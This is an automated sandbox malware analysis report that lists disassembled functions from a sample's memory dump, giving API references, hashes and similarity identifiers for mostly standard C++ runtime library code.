                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 419941038-1377069549
                                                                                                                                                                                                                              • Opcode ID: a8cb28759457e083331d6f08605445d8c9d052180f5d3d9f38013e1edc28f3b3
                                                                                                                                                                                                                              • Instruction ID: 16f1a1f4e221cef9f7ae6f175c192b3d82b22f407555b5c87da60a18060db0b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8cb28759457e083331d6f08605445d8c9d052180f5d3d9f38013e1edc28f3b3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED01D27190052EDBCB14EB64D90AABE7F66BFC4310F240509F6146B3D2CF789E418B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F29F6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F29FD
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2A07
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • moneypunct.LIBCPMT ref: 005F2A41
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2A58
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2A78
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 419941038-1377069549
                                                                                                                                                                                                                              • Opcode ID: 58eca4d3ebc2b23cb70fd019863a8aa37d2fc56addc9bd3126f7701a995d469c
                                                                                                                                                                                                                              • Instruction ID: d5163a80ce4952531b149ec7cdf5fcf63ab638cdb24a6d7990bb193143a42b70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58eca4d3ebc2b23cb70fd019863a8aa37d2fc56addc9bd3126f7701a995d469c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8901D27590012EEBCB15EB64D849ABE7FA6BF84310F240809F6146B3D2DF789E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FEA97 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FEA9E
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FEAA8
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • moneypunct.LIBCPMT ref: 005FEAE2
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FEAF9
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FEB19
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 419941038-1377069549
                                                                                                                                                                                                                              • Opcode ID: b978561f30746c53aa33dcbcef92b3c036b20f6c0402128b4a89e0bdbd4ce255
                                                                                                                                                                                                                              • Instruction ID: fffd382f1c0b05e1ee46cd3babefd10c35774104501e6ea3f7beaab82a97f08f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b978561f30746c53aa33dcbcef92b3c036b20f6c0402128b4a89e0bdbd4ce255
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC01C431D0051ADBCB15EB64980A6BE7F66BF80310F251409E6056B2E6CF389E01C791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2A92
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2A9C
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • moneypunct.LIBCPMT ref: 005F2AD6
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2AED
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2B0D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 419941038-1377069549
                                                                                                                                                                                                                              • Opcode ID: a2dea128043cba9ec42ed832ba9296f5c05f6e50507245146cc234d666086939
                                                                                                                                                                                                                              • Instruction ID: fabcd7f6a1be1e83c1f6a436db146e1b5c39d6eb557464486d346fd3edd0cc62
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2dea128043cba9ec42ed832ba9296f5c05f6e50507245146cc234d666086939
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6301A17190051A9BCB15EB6498096BE7B66BF80310F280809FA156B2D2CF789E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FEB2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FEB33
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FEB3D
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • moneypunct.LIBCPMT ref: 005FEB77
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FEB8E
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FEBAE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 419941038-1377069549
                                                                                                                                                                                                                              • Opcode ID: ca99de47eddeaeeab12b0b5104774fe3af241d6a2629e06dbb5c0d31e3801587
                                                                                                                                                                                                                              • Instruction ID: 9b506e2fcbf1965ebcb6335f51628a36b21314e7de7e8cb4208623feda2b7bdb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca99de47eddeaeeab12b0b5104774fe3af241d6a2629e06dbb5c0d31e3801587
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1101D63190051ADFCB14EB60D84A6BE7F66BF84710F240409F6156B3D2CF789E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2B20 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2B27
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2B31
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • moneypunct.LIBCPMT ref: 005F2B6B
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2B82
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2BA2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 419941038-1377069549
                                                                                                                                                                                                                              • Opcode ID: 13cd6bb365f2cddb5dd32394ce150769ede1f2bf99dfda872dee3c44c08be307
                                                                                                                                                                                                                              • Instruction ID: 0590e64a803e3aa70af05b9e5a53d46408d990c54f519caa536296f3931bfaab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13cd6bb365f2cddb5dd32394ce150769ede1f2bf99dfda872dee3c44c08be307
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B01C47590061ADBCB14EF6498496BE7F76BFC4720F240409FA146B3D2CF389E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2D74 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2D7B
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2D85
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • numpunct.LIBCPMT ref: 005F2DBF
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2DD6
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2DF6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 743221004-1377069549
                                                                                                                                                                                                                              • Opcode ID: 2a77c6c5b8f363e2310bcd843baf3152a9f351e8d346f8f92122ebf6f0db3290
                                                                                                                                                                                                                              • Instruction ID: e7be226890608adbce91204ab3536e73136104b31b06a9fefcaf1e1a3bd92403
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a77c6c5b8f363e2310bcd843baf3152a9f351e8d346f8f92122ebf6f0db3290
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED01C47590011ADBCB14EB60D8096BE7F66BFC4310F250409E614AB3D2CF789E01CBD1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00612DEE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FAB1B776,0000000C,?,00000000,00626A6C,000000FF,?,00612DC1,?,?,00612D95,?), ref: 00612E23
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00612E35
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00626A6C,000000FF,?,00612DC1,?,?,00612D95,?), ref: 00612E57
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: 2`$CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-3003339122
                                                                                                                                                                                                                              • Opcode ID: ceb399cf5f8ce1993c49414582d38d38b1a2203a8dc7e8cc36d8233b726240c3
                                                                                                                                                                                                                              • Instruction ID: d4e21731e90e65e43634adb09961bdf4b0d5f1205dfc52ff8997a3248609d5c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceb399cf5f8ce1993c49414582d38d38b1a2203a8dc7e8cc36d8233b726240c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0601A731918A69EBCB128F40DC09FEEB7BAFB04B10F040525F811A22A0D7759911CB80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00602C4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C58
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C8B
                                                                                                                                                                                                                              • RtlWakeAllConditionVariable.NTDLL ref: 00602D02
                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,005E2427,0063E638,00626B40), ref: 00602D0C
                                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,005E2427,0063E638,00626B40), ref: 00602D18
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 3916383385-1377069549
                                                                                                                                                                                                                              • Opcode ID: d8e3205072de2c61e180b0e668e0e2e5f8c978977fe9494ac16e17c595ec8cfd
                                                                                                                                                                                                                              • Instruction ID: e79cdb4f8990e7b6a393a723244687efaa8501d8c7d40f7f97e9544aef40fbca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8e3205072de2c61e180b0e668e0e2e5f8c978977fe9494ac16e17c595ec8cfd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68014275A05A60DFCB29AF18FD48E997BA7FF493517052469F80293320CB316902CBE0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F8969 Relevance: 9.4, APIs: 6, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F8970
                                                                                                                                                                                                                              • ctype.LIBCPMT ref: 005F89B7
                                                                                                                                                                                                                                • Part of subcall function 005F851C: __Getctype.LIBCPMT ref: 005F852B
                                                                                                                                                                                                                                • Part of subcall function 005F270D: __EH_prolog3.LIBCMT ref: 005F2714
                                                                                                                                                                                                                                • Part of subcall function 005F270D: std::_Lockit::_Lockit.LIBCPMT ref: 005F271E
                                                                                                                                                                                                                                • Part of subcall function 005F270D: std::_Lockit::~_Lockit.LIBCPMT ref: 005F278F
                                                                                                                                                                                                                                • Part of subcall function 005EF3D9: __EH_prolog3.LIBCMT ref: 005EF3E0
                                                                                                                                                                                                                                • Part of subcall function 005EF3D9: std::_Lockit::_Lockit.LIBCPMT ref: 005EF3EA
                                                                                                                                                                                                                                • Part of subcall function 005EF3D9: std::_Lockit::~_Lockit.LIBCPMT ref: 005EF48E
                                                                                                                                                                                                                                • Part of subcall function 005F2837: __EH_prolog3.LIBCMT ref: 005F283E
                                                                                                                                                                                                                                • Part of subcall function 005F2837: std::_Lockit::_Lockit.LIBCPMT ref: 005F2848
                                                                                                                                                                                                                                • Part of subcall function 005F2837: std::_Lockit::~_Lockit.LIBCPMT ref: 005F28B9
                                                                                                                                                                                                                                • Part of subcall function 005EF3D9: Concurrency::cancel_current_task.LIBCPMT ref: 005EF499
                                                                                                                                                                                                                                • Part of subcall function 005F29F6: __EH_prolog3.LIBCMT ref: 005F29FD
                                                                                                                                                                                                                                • Part of subcall function 005F29F6: std::_Lockit::_Lockit.LIBCPMT ref: 005F2A07
                                                                                                                                                                                                                                • Part of subcall function 005F29F6: std::_Lockit::~_Lockit.LIBCPMT ref: 005F2A78
                                                                                                                                                                                                                                • Part of subcall function 005F2961: __EH_prolog3.LIBCMT ref: 005F2968
                                                                                                                                                                                                                                • Part of subcall function 005F2961: std::_Lockit::_Lockit.LIBCPMT ref: 005F2972
                                                                                                                                                                                                                                • Part of subcall function 005F2961: std::_Lockit::~_Lockit.LIBCPMT ref: 005F29E3
                                                                                                                                                                                                                              • collate.LIBCPMT ref: 005F8B05
                                                                                                                                                                                                                              • numpunct.LIBCPMT ref: 005F8DAF
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 005F8B47
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                                • Part of subcall function 005E6330: LocalAlloc.KERNEL32(00000040,?,005F0E04,00000020,?,?,005E9942,00000000,FAB1B776,?,?,?,?,006250DD,000000FF), ref: 005E6336
                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 005F8E6D
                                                                                                                                                                                                                                • Part of subcall function 005F2E09: __EH_prolog3.LIBCMT ref: 005F2E10
                                                                                                                                                                                                                                • Part of subcall function 005F2E09: std::_Lockit::_Lockit.LIBCPMT ref: 005F2E1A
                                                                                                                                                                                                                                • Part of subcall function 005F2E09: std::_Lockit::~_Lockit.LIBCPMT ref: 005F2E8B
                                                                                                                                                                                                                                • Part of subcall function 005F2F33: __EH_prolog3.LIBCMT ref: 005F2F3A
                                                                                                                                                                                                                                • Part of subcall function 005F2F33: std::_Lockit::_Lockit.LIBCPMT ref: 005F2F44
                                                                                                                                                                                                                                • Part of subcall function 005F2F33: std::_Lockit::~_Lockit.LIBCPMT ref: 005F2FB5
                                                                                                                                                                                                                                • Part of subcall function 005F22FA: __EH_prolog3.LIBCMT ref: 005F2301
                                                                                                                                                                                                                                • Part of subcall function 005F22FA: std::_Lockit::_Lockit.LIBCPMT ref: 005F230B
                                                                                                                                                                                                                                • Part of subcall function 005F22FA: std::_Lockit::~_Lockit.LIBCPMT ref: 005F237C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3494022857-0
                                                                                                                                                                                                                              • Opcode ID: 406583eb9bcee24864bdff3352ccdafdba3409d88ae8761b0611d40679330056
                                                                                                                                                                                                                              • Instruction ID: 4982f46ad601844e8e7047707c01759251816a5d52963bbca40bbd55c54a05b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 406583eb9bcee24864bdff3352ccdafdba3409d88ae8761b0611d40679330056
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80E1FBB0C0121E9BDB146F758C0A67F7EA6FF85350F144829FA496B281EF794D0097E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EB500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005EB531
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005EB54F
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005EB577
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,0000000C,00000000,FAB1B776,?,00000000,00000000), ref: 005EB5CF
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005EB6B7
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005EB6E1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
